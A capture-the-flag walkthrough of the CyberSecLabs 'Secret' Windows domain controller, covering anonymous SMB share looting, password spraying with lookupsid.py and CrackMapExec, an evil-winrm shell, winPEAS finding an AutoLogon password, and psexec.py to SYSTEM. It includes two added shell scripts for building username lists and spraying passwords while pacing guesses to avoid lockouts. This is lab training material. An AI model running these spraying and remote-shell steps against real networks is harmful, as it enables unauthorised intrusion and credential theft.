CyberSecLabs and “Secret” Challenge Walkthrough

Joe Helle
Apr 15, 2020

Last week, CyberSecLabs (cyberseclabs.co.uk) broke into the pentesting lab scene by releasing numerous real-world lab environments aimed at introductory and intermediate users alike. They offer the “Hello World” of boxes, based on EternalBlue, as well as other Linux and Windows machines. The lab environments are incredibly responsive and quicker to start up and access than the HTB alternative that we’ve all grown increasingly frustrated with over the last several months. The user dashboard is interactive, letting you know how many challenges and machines you’ve completed, as well as server information and more. It’s clean, well thought out, and not a confusing maze of links like the HTB dashboard.

My profile/dashboard page on CyberSecLabs

As you can see, I’ve done a couple of the beginner labs, as well as one of the “Community Labs,” which are considered a bit more difficult than the beginner labs.

“Secret” Walkthrough

Machine control dashboard

Like most other pentesting lab challenges and environments, we are met with a simple description of the machine and its underlying operating system. So let’s get to work. We connect using OpenVPN with the .ovpn file downloaded from the dashboard, then click the start button on the machine (where the stop button is in the screenshot above).

Information Gathering

The first thing we need to do is get an understanding of our target machine by running:

nmap -T4 -A -Pn 172.31.2.1

We can quickly determine from the returned information that we are looking at a Windows Server acting as a Domain Controller.

Great! We have some information to work with. SMB is running on 139/445, Kerberos is running on 88 (a strong hint that this is a Domain Controller), and the nmap script output gives us the domain name, SECRET.org.

Enumeration and First Low Privilege Hash

Now that we have some information to go on, let’s start poking around. Starting with the easiest targets and working outward, we begin by listing the SMB shares:

smbclient -L \\\\172.31.2.1\\

As we can see, there are several shares, but one stands out: Office_Share. Let’s connect to it in the hope that it allows anonymous (null-session) access; when smbclient prompts for a password, just press Enter (or pass -N to skip the prompt):

smbclient \\\\172.31.2.1\\Office_Share

It does, and this is a common misconfiguration: a share readable without any credentials. Further enumeration shows several directories named after users, which we should note down.

SMB Directory

Now that we know there are directories available, we could walk them manually; instead I’ve chosen to download the directories and their contents to my Kali machine with the following smbclient commands:

recurse ON
prompt OFF
mget *

SMB download command and results

While downloading we also see a couple of .txt documents (picked up because recursion is on). Inspecting the downloaded directory, we can clearly see a password, but we don’t know whom or what it belongs to.

Didn’t think you were getting off that easy I hope

So we have a password and a bunch of user directories, but no idea which account the password belongs to. Impacket’s lookupsid.py brute-forces SIDs over LSARPC to enumerate the domain’s users and groups, but it needs one valid credential to do so. Trying each candidate by hand would take time. Instead, we build a username list ourselves, expanding the directory names we found earlier into the common Active Directory naming conventions, and loop lookupsid.py over it with a simple Bash one-liner. Keep the domain lockout policy in mind when spraying one password across many accounts.

Username List

With our list of possible usernames, we can put lookupsid.py to work using the following command:

for user in $(cat users.txt); do lookupsid.py SECRET/$user:'<insert that password we found>'@172.31.2.1; done

Failed Attempt Example
Successful Attempt Example

If you used the above example username list, you will see that the 8th attempt was successful. Please make note of this name, as I will not give it away. Also keep the output of the successful lookupsid.py run: it lists every domain user and group by RID, and those names may be useful later.
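To turn the user-named directories from the share into the spray list described above, here is a small POSIX shell helper, added to this walkthrough as an example (it is not the author’s script). It assumes the share was pulled down with mget into ./Office_Share (override with SHARE_DIR) and expands each top-level directory name into the usual Active Directory conventions (first.last, flast, firstl, lastfirst, and so on) plus the name itself, de-duplicated. It needs no network access; it only reads directory names. The directory names mentioned in the comments are constructed samples, not the ones on the box.

```shell
#!/bin/sh
# Added example for this walkthrough (not the author's script): build a
# candidate username list from the user-named directories pulled off the share.
# Assumes the share was downloaded with `mget *` into ./Office_Share (override
# with SHARE_DIR). No network access is needed; it only reads directory names.

# gen_candidates "Jane Doe" -> janedoe, jane.doe, jdoe, janed, ... one per line.
# Separators . _ - are treated like spaces so "j.doe" and "jane_doe" also split.
gen_candidates() {
    raw=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    # Keep the directory name itself when it already looks like an account name
    # (e.g. a constructed sample "svc_backup"); skip it when it contains spaces.
    case $raw in *' '*) ;; *) printf '%s\n' "$raw" ;; esac
    # Word splitting is intended here: split into name parts.
    set -- $(printf '%s' "$raw" | tr '._-' '   ')
    [ "$#" -ge 2 ] || return 0
    first=$1
    shift $(( $# - 1 ))
    last=$1
    f1=$(printf '%s' "$first" | cut -c1)
    l1=$(printf '%s' "$last" | cut -c1)
    printf '%s\n' "$first$last" "$first.$last" "$f1$last" "$first$l1" \
        "$last$first" "$last.$first" "$f1.$last" "$first" "$last"
}

# gen_usernames DIR -> de-duplicated candidate list built from DIR's
# top-level subdirectory names, in discovery order.
gen_usernames() {
    for d in "$1"/*/; do
        [ -d "$d" ] || continue          # unmatched glob: nothing to do
        d=${d%/}
        gen_candidates "$(basename "$d")"
    done | awk '!seen[$0]++'
}

# Usage: print the list to feed the spray loop (redirect to users.txt).
gen_usernames "${SHARE_DIR:-./Office_Share}"
```

Redirect the output to users.txt and feed it to the lookupsid.py loop above. Because every directory name expands to roughly ten candidates, the list grows quickly; count the lines before spraying so you know how many logon failures each account will see.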

Method #2

Alternatively, CrackMapExec can test the password against the whole username list in one pass; every result line marked [+] is a valid logon. The command is as follows:

crackmapexec smb 172.31.2.1 -u users.txt -p <passwordhere>

Knowing the username and password, we can try to get a shell with psexec.py, but this fails: psexec.py has to write its service binary to a share (normally ADMIN$), which requires local administrator rights this user does not have. A bit of searching around turns up a tool called “evil-winrm,” which uses Windows Remote Management, listening on port 5985 as seen in the nmap scan, and only needs an account that is allowed to use WinRM. Luckily, we have such credentials. The following command gives us a PowerShell prompt as the user we know so far:

evil-winrm -i 172.31.2.1 -u <username> -p <password>

evil-winrm Powershell Command Prompt

Changing into this user’s Desktop gives us our first flag, access.txt. Use more access.txt (or type access.txt) to reveal the hash and submit it on the dashboard.

Access Flag

We can try the other user directories, but quickly find that they belong to more privileged users and our account is denied access.

Privilege Escalation

As we have no access to the higher-privileged directories, we need a way to escalate. A bit of research suggests that “winPEAS,” a Windows privilege-escalation enumeration tool, is a suitable choice, so we upload it to the target with the upload command built into the evil-winrm prompt:

upload winPEAS.exe

(adjust the local path to wherever winPEAS.exe sits on your machine; without a remote path it lands in your current working directory on the target)

winPEAS.exe upload

Before running winPEAS.exe, change into the directory you uploaded it to (adjust the path to match):

cd C:\Users\<usernamehere>\Desktop

Then run it from the PowerShell prompt:

.\winPEAS.exe

The output is long; redirecting it to a file (.\winPEAS.exe > peas.txt) and pulling that back with evil-winrm’s download command makes it easier to read offline.

The scan can take several minutes to complete. Once it finishes, scroll through the output. One finding should particularly stand out: a “Default Password.” winPEAS reports this when the Winlogon AutoLogon values in the registry (under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) hold a clear-text password so a user can be logged on automatically. Note it down, as we will need it to take control of the system.

Default Password

Armed with this new password, we modify our earlier lookupsid.py loop, swapping in psexec.py. Since we aren’t sure whether the password belongs to another user, or which one if it does, we simply put the new password where the old one was and run it:

for user in $(cat users.txt); do psexec.py SECRET/$user:'<newpassword>'@172.31.2.1; done

We get output like we did the first time, but psexec.py drops us into a command shell as soon as it hits the user the password belongs to. Because psexec.py only works for an account with administrative rights, that shell runs as NT AUTHORITY\SYSTEM. Count the number of attempts it took and look back at your username list to determine which user it was.
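The two for-loops in this walkthrough (lookupsid.py with the password from the share, psexec.py with the password from winPEAS) are the same operation: spray one password across a username list and note which attempt succeeds. The following POSIX shell helper is an added example, not the author’s code. It generalises that loop with a pluggable authenticator, stops at the first hit, reports the attempt number on stderr, and, when given several passwords, sprays password-outer/user-inner with a delay so each account sees one guess per window. The real authenticator at the end assumes Impacket’s lookupsid.py output markers and the lab’s SECRET domain and 172.31.2.1 address; the usage call is commented out so the file runs offline.

```shell
#!/bin/sh
# Added example for this walkthrough (not the author's one-liners). Generalises
#   for user in $(cat users.txt); do <tool> SECRET/$user:'<pass>'@172.31.2.1; done
# into a reusable spray loop. AUTH is the name of a shell function called as
# "AUTH user password" that returns 0 only when the logon worked.

# spray_password USERS_FILE PASSWORD AUTH
#   Tries PASSWORD against each user in order; prints "user:password" for the
#   first hit, reports the attempt number on stderr (the walkthrough counts
#   attempts to identify the user) and returns 0. Returns 1 if nothing matched.
spray_password() {
    users_file=$1; pass=$2; auth=$3
    attempt=0
    while IFS= read -r user || [ -n "$user" ]; do
        case $user in ''|'#'*) continue ;; esac      # skip blanks and comments
        attempt=$((attempt + 1))
        if "$auth" "$user" "$pass"; then
            printf '%s:%s\n' "$user" "$pass"
            printf 'hit on attempt %d\n' "$attempt" >&2
            return 0
        fi
    done < "$users_file"
    return 1
}

# spray_all USERS_FILE PASSWORDS_FILE AUTH [DELAY_SECONDS]
#   Password-outer, user-inner: every account sees at most one guess per pass,
#   and DELAY between passes keeps you under a lockout threshold such as
#   "5 bad attempts in 30 minutes" when DELAY is at least that window.
#   Prints all hits; returns 0 if there was at least one.
spray_all() {
    users_file=$1; pw_file=$2; auth=$3; delay=${4:-0}
    hits=0
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -n "$pw" ] || continue
        if spray_password "$users_file" "$pw" "$auth"; then
            hits=$((hits + 1))
        fi
        if [ "$delay" -gt 0 ]; then sleep "$delay"; fi
    done < "$pw_file"
    [ "$hits" -gt 0 ]
}

# Real authenticator for the lab (not invoked in this file). Assumes Impacket's
# lookupsid.py, which prints STATUS_LOGON_FAILURE on a bad password and lists
# SidTypeUser entries when the logon succeeds; check these markers against your
# Impacket version. Domain and address are the lab's.
auth_lookupsid() {
    out=$(lookupsid.py "SECRET/$1:$2@172.31.2.1" 2>&1)
    case $out in *STATUS_LOGON_FAILURE*) return 1 ;; esac
    printf '%s\n' "$out" | grep -q SidTypeUser
}
# Example invocation against the lab (commented out so the file runs offline):
#   spray_password users.txt '<password from the share>' auth_lookupsid
```

For the psexec.py stage, write an authenticator that checks the tool’s output the same way rather than relying on its exit status, and let spray_password tell you the attempt number instead of counting the loop output by hand.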

NT AUTHORITY\SYSTEM Access

We can finally move into the Administrator user’s Desktop directory and find our hard-earned, shiny system.txt flag. Grab it, submit the hash on the dashboard, and the challenge is complete.

system.txt flag

Method #2

Using CrackMapExec, we add the new-found password to our password list and spray both lists at once. Each valid username/password pair is reported with [+], and (Pwn3d!) marks the accounts that have administrative rights, i.e. the ones psexec.py will work with. With two lists CrackMapExec tries every combination, so keep the lockout policy in mind. The command is:

crackmapexec smb 172.31.2.1 -u /root/Desktop/users.txt -p /root/Desktop/passes.txt

crackmapexec credentials

We then use psexec.py with the administrative credentials to gain an elevated command shell on the machine, where we can finish our tasks:

psexec.py SECRET/<username>:'<password>'@172.31.2.1

psexec login and command shell
nt authority\system
system flag


Father | Husband | Army Veteran | Former Mayor | Chief Operating Officer | Red Team Lead | CISM | PNPT | OSCP | Retired Moonshiner | Twitter @joehelle